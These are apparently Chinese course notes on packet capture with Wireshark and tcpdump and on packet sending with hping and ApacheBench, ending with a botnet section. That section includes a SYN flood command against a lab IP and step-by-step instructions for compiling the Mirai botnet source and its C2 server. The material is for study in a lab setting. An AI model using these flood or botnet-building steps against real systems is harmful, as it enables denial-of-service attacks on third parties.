信息安全微专业(二) 抓包发包

一、网络抓包

1. wireshark

winpcap→npcap
lookback抓取本地回环

【模拟实验1】抓取aq.163.com

选网卡选波动最大的
快速滚动的颜色区域是数据包,一行代表一个包,不同颜色代表不同类型
什么都不干,网卡也会有大量数据通信(内网通信、本地回环、本地默认服务和后台运行程序……)
https对于wireshark加密
浏览器第一次请求http会跳转到https,对于多次访问的网站会默认缓存这个动作,不再请求http
设置过滤规则 http.host=="aq.163.com"
输入时关键字会自动补全
自动检测输入,绿色底为书写正确
选中一行数据包后,下面会显示该数据包的详细数据(物理、mac、网络、传输、应用)
原始数据以16进制和字符串形式展示
右键点击--追踪流--http流
可查看完整的HTTP请求和响应(类似burp)
去诶单是仅可以抓取到HTTP。因为HTTPS是加密传输
过滤规则 ip.addr==59.11.160.94 获取完整四层通信
前三个包:tcp三次握手
SYN包 > SYNACK包 > ACK包
建立tcp连接,发送http数据
服务端返回301跳转,变成https(响应包)
三次握手(443端口)
ssl握手(交换加密证书和秘钥。Certificate,Key EXchange)

过滤规则:

eq == 等于
ne != 不等于
gt > 大于
lt < 小于
ge >= 大于等于
le <= 小于等于
and && 逻辑与
or || 逻辑或
xor ^^ 逻辑异或
not ! 逻辑非

协议过滤格式:tcp / udp / http / udp&&dns / dup&&!dns
IP过滤格式:ip.src==10.219.163.0/24

ip.src    源地址
ip.dst    目的地址
ip.addr   源地址 / 目的地址

端口过滤:tcp.dstport==80
内容过滤:
http.request.uri contains'static'
http.request.uri matches "^/static/"

contains  匹配字符串,包含指定的字符串
maches    匹配正则表达式。"^/"表示开始,"static"为期望的字符串

源IP统计:菜单 > 统计 > IPv4 statistics > All address
计算所有IP的请求排行,排行结果可以导出另作他用

【模拟实验2】研究三次握手

2.tcpdump

安全排查需要服务器抓包,但是linux系统一般是命令行,无GUI,内网访问控制很难安装第三方抓包程序
kali默认安装tcpdump

kali切换root用户:sudo -i
                 sudo -iu root
命令行开头变为井号,切换成功

查看tcpdump是否安装:tcpdump -h

tcpdump抓包:
tcpdump tcp port 80 -nn -vv

参数解释:
-i 指定网卡
-any 监听所有网卡
-i eth0 监听eth0
-n / -nn 不解析主机名/端口名
-v / -vv 显示更多包信息
-r / -w 读取文件/输出到文件
-c 抓取包个数
-s 抓取每个包字节长度,0表示整个包

数据包类型:
tcp / udp / icmp 协议关键字
src / dst 传输方向关键字
host / net / port 包类型关键字
and(&&) / or(||) / not(!) 逻辑表达式
[x:y] 高级包头过滤。指定数据包中的字符范围,类似wireshark中的contains

tcpdump生成pcap数据文件:
tcpdump tcp port 80 -w aq.163.com.pcap
tcpdump指定多个端口:
tcpdump tcp port 80 or port 443 -nn-vv
tcpdump 指定源host和目的端口:
tcpdump -i any -nn -vv src host 192.168.164.136 and dst port 80
tcpdump配合gerp使用(linux搜索工具):
tcpdump tcp port 80 -nn -vv | gerp'163.com'
tcpdump只抓取http请求:
tcpdump tcp[20:4]=0x47455420 or tcp[20:4]=0x504f5354 -nn -vv

tcp头部一般20个字节,后面为数据部分,取数据部分前四个字节,写为TCP[20:4]
数据前四个字节为"GET+space",或者为POST,即为HTTP请求(取他们的16进制数据匹配)
更准确的写法:把20换成(tcp[12:1]&0xf0)>>2

经典面试题:从url输入到页面展现发生了什么?

3.数据包分析

【模拟实验3】DNS解析
wireshark中输入过滤规则:http contains "aq.163.com"
域名解析请求:dns contains "\x02aq\x03163\x03com"
请求和响应对比:
IP协议--源/目的地址
UDP协议--源/目的端口
transcation ID
Flags

DNS资源记录的Name:
\x02 aq \x03 163 x03 com \x00
\x03 www \x06 google \x03 com \x00

DNS资源记录的Type:

DNS资源记录的TTL:
十六进制:0x012c;十进制:300
5分钟(300秒)后,DNS缓存过期

DNS重绑定(DNS Rebinding):自建DNS服务器,TTL设置为0,每时每刻都要和DNS服务器交互
无论域名解析经过多少步,我们抓包只能看到step1的dns query和step8的dns response

linux dig命令:dig ag.163.com+trace
请求根服务器root-servers.net,j服务器返回com域服务器
gtld-servers.net,b服务器返回163.com域名服务器
ns8.166.com返回aq.163.com的记录59.111.160.194

【模拟实验4】TCP握手
wireshark中输入过滤规则:http contains "aq.163.com",右键追踪tcp流

tcp连接的建立(三次握手)

tcp标志位
syn flag: 000010=0x02
syn-ack flag: 010010=0x12
ack flag:010000=0x10

三次握手之SYN包:
1.SYN=1, seq=x
flag=0x02, seq=2715693670
2.flag=0x12, seq=3526619357
ack=2715693670+1
3.flag=0x10
seq=2715693670+1
ack=3526691357+1

TCP连接的释放(四次挥手):
实际情况1:输入aq.163.com快速关闭浏览器后,客户端发送FIN到服务端(第一步),服务端发送FIN到客户端(包含第二三步),客户端发送ACK,TCP断开(第四步)
实际情况2:一直不关浏览器,服务端发起,过程颠倒

【模拟实验5】HTTP请求
tcp[12:1]
前面有3行,每行4字节,取12个字符后开始的第一个字节

tcp[12:1]&0xf0
只取前4个比特,后4个比特是0

4
得到数据偏移的数值

乘以4(<<2)
与真正的tcp头部长度差4倍,每个偏移可以表示4个字节,即向左移动两位

aq.163.com的http请求:
真实数据包中的tcp头部
tcp头部是8:8*4=32字节
tcp头部最大:15*4=60字节

HTTPS交互:
wireshark过滤规则:ip.addr==59.111.160.194
Client Hello:443端口刚刚建立好第一个传输包。cipher suites字段:加密算法
Server Hello:对Client Hello的响应。服务端从上面17种中选择1种,每种2字节,后续所有交互基于这种算法

TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
EC- 椭圆曲线;-E 临时的
非对称加密算法:ECDHE_RSA。用于在握手过程中加密生成的密码(DH- 基于离散对数的秘钥交互算法)
对称加密算法:AES_128_GCM。用于对真正传输的数据进行加密
HASH算法:SHA256.用于验证数据的完整性

HTTPS简化流程:

二、网络发包

1. hping

源码地址:https://github.com/antirez/hping
开源。C语言编写。TCP/IP数据包的C语言经典实现
安装包下载地址:http://hping.org/download.php
kali下自带hping,免安装。只需在root下输入hping3 -h,通过查看使用文档判断能否正常启动
红帽安装命令:yum install hping3
Debian安装命令:apt-get install hping3

136发包:hping3 --syn --flood 192.168.164.137
137抓包:tcpdump src host 192.168.164.136

Ctrl+C 停止抓包

通用参数:
-h, --help 显示帮助
-v, --version 显示版本
-I, --interface 网卡接口
-d, --data 发送数据包内容长度,缺省为0
-c, --count 发送数据包的数目,缺省一直发
数据包类型:
-1, --icmp 发icmp包
-2, --udp 发udp包
-S, --syn 发tcp包,标志位是syn
-A, --ack 发tcp包,标志位是ack
-R, --rst 发tcp包,标志位是rst
-F, --fin 发tcp包,标志位是fin
-P, --push 发tcp包,标志位是push
-U, --urg 发tcp包,标志位是urg
发送速率:
-i, -interval 发送数据包间隔ux,x是微秒
--fast -i u100000(每秒10个)
--faster -i u10000(每秒100个)
--flood 尽快发送

2. apachbench

开源。一个c文件。2000行代码
https://httpd.apache.org/docs...
kali:免安装自带。ab -h查看使用文档
红帽:yum install httpd-tools
Debian:apt-get install apache2-utils

开启.137的web服务:80端口
/etc/init.d/apache2.start
.136的请求:显示apache首页证明启动好了
curl http://192.168.164.137/ | grep title -t10
.136请求发包:
ab -t 10 -C100 http://192.168.164.137 -C100
.137开启抓包:利用tcp偏移长度匹配GET
tcpdump 'tcp[((tcp[12:1]&0xf0) >> 2):4] = 0x47455420' -nn
.137应用层日志:
tail -100 /var/log/apache2/access.log

.137启动apache:
/etc/init.d/apache2 start
136 curl
137输入tcpdump命令,抓取get请求
136ab是否可以执行ab -h
输入发包命令
136源端口递增
137目的端口都说80,长度统一,访问的都是根目录,使用http1.0协议
Ctrl+C关闭抓包
tail日志

通用参数:
-h 显示帮助
-V 显示版本
-n 总共的请求执行数,缺省为1
-c 并发数,缺省为1
-t 测试所进行的总时间,单位为秒,缺省50000秒
HTTP格式参数:
-H 添加请求头,可重复该参数添加多行
-C 添加cookie信息,可重复该参数添加多个
-k 启用HTTP Keep Alive功能
-m 设置任意请求方法
-i 执行HEAD请求,而非默认的GET
-p 执行POST请求,而非默认的GET
-u 执行PUT请求,而非默认的GET
-T 添加Content -type头信息与-p和-u配合

ab设置UA
136:ab -n 100 -H "user-Agent:Mozila/5.0" http://192.168.164.137/
137:tail -n 10 /var/log/apache2/access.log

ab设置请求方法
136:ab -t10 -mPOST http://192.168.164.137
137:``

ab传递参数
136:echo '{"name":"netease"}' > data.json
ab -p data.json -T application/json http://192.168.164.137

137:tcpdump src host 192.168.164.136 -nn -vv

ab伪造IP
-x 设置代理,proxy:port模式。本机用port设置代理

136:ab -n 100 -X 192.168.164.1:8888 http://192.168.164.137
137:
收到的源IP地址为192.168.164.1

136上用burp>HTTP history查看历史

3. 僵尸网络

僵尸网络(botnet)是攻击者出于恶意目的,传播僵尸程序控制大量主机,并通过一对多的命令与控制信道所组成的网络
其中用来发起命令,控制的信道是僵尸程序
控制服务器:command and control server / C&C / C2 / CnC
傀儡机(肉鸡):bot
C2服务器和肉鸡组成类似星型的网络

僵尸网络发包:
攻击者远程登录C2
控制C2向bots发送发包指令(进行攻击)
不计延时,所有肉鸡几乎同时收到指令
bots向受害者发包

mirai源码编译:https://github.com/jgamblin/M...
代码质量差,半成品,不建议阅读
bot目录最后生成的二进制文件是在肉鸡上运行的,因为涉及发包操作,考虑到效率,用C编写
cnc目录生成的二进制文件在主控上运行,用来和bot程序通信,给攻击者登录管理接口(go语言)
loader 下载器,可以在线下下载不同类型的bot程序
tools 加密小程序
scripts 脚本文件

mirai编译步骤
C2主控域名配置
编译加密工具:
root@kali:~/Mirai-Source-Code# cd mirai/tools && gcc enc.c -o enc.out
加密域名:
root@kali:~/MSC/mirai/tools ./enc.out string cnc.mirai.com

root@kali:~/MSC/mirai/tools ./enc.out string report.mirai.com

修改/mirai/bot/table.c代码

2.MySQL数据库配置
kali自带MySQL。启动MySQL
root@kali:~/MSC/etc/init.d/mysql/start
Starting mysql (via systemctl):mysql service

修改root密码
修改/scripts/db.sql开始
CREATE DATABASE mirai;
use mirai;
CREATE TABLE 'history'

修改/scripts/db.sql结束
CREATE TABLE 'whitelist'(...);
INSERT INTO users VALUES (NULL, 'mirai', 'mirai'; 0.0.0.0,-1,1,30,'');

执行SQL脚本
修改/mirai/cnc/main.go数据库配置
(修改第三行密码为之前的mysql密码)

3.交叉编译环境配置
创建交叉编译目录:cross-compile-bin,必须与mirai的目录一致
瞎子啊其他平台的编译环境
修改环境变量 ~/.bashrc
环境变量立刻生效
更新软件列表。脚本会在线下载一下软件,比如gcc.golang,不更新下载不下来
执行 /script/cross-compile.sh脚本

4.go编译依赖包配置
go的MySQL数据库依赖
go的命令行解析依赖

5.运行编译脚本
创建debug目录
修改 /mirai/bot/includes.h
/mirai/build.sh脚本运行

你可能感兴趣的:(信息安全)